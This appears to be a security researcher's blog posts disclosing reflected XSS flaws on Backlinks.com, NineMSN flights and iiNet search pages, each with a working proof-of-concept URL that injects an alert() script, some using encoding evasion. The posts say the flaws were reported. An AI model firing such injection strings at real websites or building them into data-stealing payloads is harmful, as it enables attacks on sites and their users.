The help document search form on Backlinks.com does not correctly sanitise user input allowing an XSS attack to be executed.
The follow symbols are converted to to their URL encoded counterparts: ‘<‘, ‘>‘, ‘/‘
Evasion string used (before encoding):
/><script>alert(/XSS/)</script>
|
1 2 3 |
http://www.backlinks.com/kb/index.php/search ?search=1 &searchtext=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E |
After browsing around on the NineMSN website for a little while (for about 10 minutes) I found a XSS vulnerability on a very common page. The NineMSN flights page is located here:
http://flights.ninemsn.com.au/
The page did not sanitise input from the depart and return input. The form was expecting a date but any string could be provided as input to execute an XSS attack.
Here is the vulnerability:
Vulnerable Code:
|
1 2 3 4 5 6 7 8 9 10 |
http://flights.ninemsn.com.au/flights/search ?wg_trip_type=true &wg_origin=1 &wg_destination=1 &wg_outbound_date=12/10/2012 &wg_inbound_date=15/10/2012 &wg_from="><script>alert(/XSS from field/)</script> &wg_to="><script>alert(/XSS to field/)</script> &ts_code=1 &ddcurrency=1 |
This vulnerability has been reported and I have been added to the Microsoft Hall of Fame for October 2012.
Why not have a look around Microsoft’s websites and see if you can find one too.
iiNet, a major ISP in Australia seems to be a little less secure than they claim they are. After merely searching for XSS vulnerabilities on their website for 5 minutes, I had found these two vulnerabilities. Two non-persistent vulnerabilities, one surprisingly located in iiNet’s main search page.
Here is the main search page vulnerability:
Code:
|
1 |
http://www.iinet.net.au/search/?q=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&search=Search&scope=site |
This is another vulnerability on the iiNet Freezone main page:
Code:
|
1 |
http://freezone.iinet.net.au/index/search?searchValue="><script>alert(String.fromCharCode(88, 83, 83))</script>&submit.x=22&submit.y=15 |
I have reported the above vulnerabilities to iiNet and have gotten no response. Hopefully they will fix the vulnerabilities in the near future.
